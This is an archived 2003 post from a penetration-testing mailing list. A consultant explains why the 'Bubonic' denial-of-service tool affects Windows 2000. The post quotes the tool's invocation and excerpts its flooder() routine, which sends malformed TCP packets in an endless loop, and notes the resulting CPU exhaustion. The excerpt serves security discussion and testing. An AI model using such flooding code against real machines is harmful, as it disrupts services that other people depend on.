Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

RE: Bubonic DoS tool

From: "Yonatan Bokovza" <Yonatan () xpert com>
Date: Tue, 11 Mar 2003 12:09:40 +0200
-----Original Message-----
From: Indian Tiger [mailto:indiantiger () mailandnews com]
Sent: Thursday, February 06, 2003 18:43
To: pen-test () securityfocus com
Cc: sil () antioffline com
Subject: Bubonic DoS tool


Hi All,

I was testing the  "Bubonic.c lame DoS against Windows 2000 
machines and
certain versions of Linux in a test scenario over Linux 8.0. 
I have compiled
it's source code and running it's binary as follows:
# ./bubonic 10.3.10.22 10.3.8.70 100 1000
On executing the above command, there was no observable 
immediate effect,
but the Hub was showing the collisions (which were the Red 
Steady). Etherial
shows the packets routed to desination.
But after executing the command the destination machine must be
blocked/freeze, but it's not happening.


The code is very easy to understand. The "interesting" part is
in flooder(), my comments inline:

void flooder(void)
{
...
    packet.ip.ip_p              = IPPROTO_TCP;
    packet.ip.ip_tos            = rand();
...
    packet.tcp.th_flags         = random();
    packet.tcp.th_win           = 65535;
    packet.tcp.th_seq           = random();
    packet.tcp.th_ack           = 0;
    packet.tcp.th_off           = 0; 
    packet.tcp.th_urp           = random();
    packet.tcp.th_dport         = random();
...
    cksum.pseudo.ptcl           = IPPROTO_TCP;
    cksum.pseudo.tcpl           = random();
...
    for(i=0;;++i) {
...
       if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0);
    }
}

To sum up and simplify, this sends TCP packets with bad header.
As a result, my unpatched win2k's CPU graph stays over 90%
in the kernel, causing Albinoni to sound bad.

Best Regards, 

Yonatan Bokovza
IT Security Consultant
Xpert Systems

----------------------------------------------------------------------------

Are your vulnerability scans producing just another report?
Manage the entire remediation process with StillSecure VAM's
Vulnerability Repair Workflow.
Download a free 15-day trial:
http://www2.stillsecure.com/download/sf_vuln_list.html
Previous By Date Next
Previous By Thread Next

Current thread: